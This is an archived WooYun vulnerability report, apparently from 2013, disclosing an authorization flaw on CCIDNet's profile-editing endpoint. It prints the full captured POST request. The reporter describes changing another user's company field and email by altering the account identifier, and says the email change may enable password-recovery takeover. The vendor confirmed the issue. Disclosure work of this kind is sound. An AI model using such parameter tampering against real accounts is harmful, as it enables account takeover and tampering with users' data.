漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044416
漏洞标题:赛迪网官网越权可修改他人关键信息
相关厂商:赛迪网
漏洞作者: sql
提交时间:2013-11-29 14:16
修复时间:2014-01-13 14:17
公开时间:2014-01-13 14:17
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-29: 细节已通知厂商并且等待厂商处理中
2013-11-29: 厂商已经确认,细节仅向厂商公开
2013-12-09: 细节向核心白帽子及相关领域专家公开
2013-12-19: 细节向普通白帽子公开
2013-12-29: 细节向实习白帽子公开
2014-01-13: 细节向公众公开
简要描述:
rt
详细说明:
我也发个越权的。
我先注册一个号修改自己的资料,抓包得到。
post
http://register.ccidnet.com/passport/passport
action=5&accountID=2712091&accountName=sqlwooyun&email=sqlwooyun%40126.com&phone=&companyname=%C3%C0%C5%AE%A3%AC%C4%E3%BA%C3+%CE%D2%CF%EB%BA%CD%C4%E3%D7%F6%C5%F3%D3%D1%A1%A3&vocation=-1&job=-1&leadship=-1&chinesename=&sex=-1&birthday=&education=-1&oicq=&msn=&mobile=&firstnet=1&idtype=1&id=&salary=-1&homepage=&companyscale=-1&companytype=-1&business=&country=%D6%D0%B9%FA&province=%C7%EB%D1%A1%D4%F1%CA%A1%B7%DD%C3%FB&city=%C7%EB%D1%A1%D4%F1%B3%C7%CA%D0%C3%FB&address=%C3%C0%C5%AE%A3%AC%C4%E3%BA%C3+%CE%D2%CF%EB%BA%CD%C4%E3%D7%F6%C5%F3%D3%D1%A1%A3&zipcode=
然后我修改accountName 是sqlwooyun1的账号。
哈哈 我把他的单位 改成了 :美女,你好,我想和你做朋友。
email我也给他改了。
哈哈,挺好玩的。
漏洞证明:
如上,不知email是否会影响到该用户的密码取回,希望检查。
修复方案:
加强权限控制
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-11-29 15:31
厂商回复:
谢谢提醒,已经着手处理
最新状态:
暂无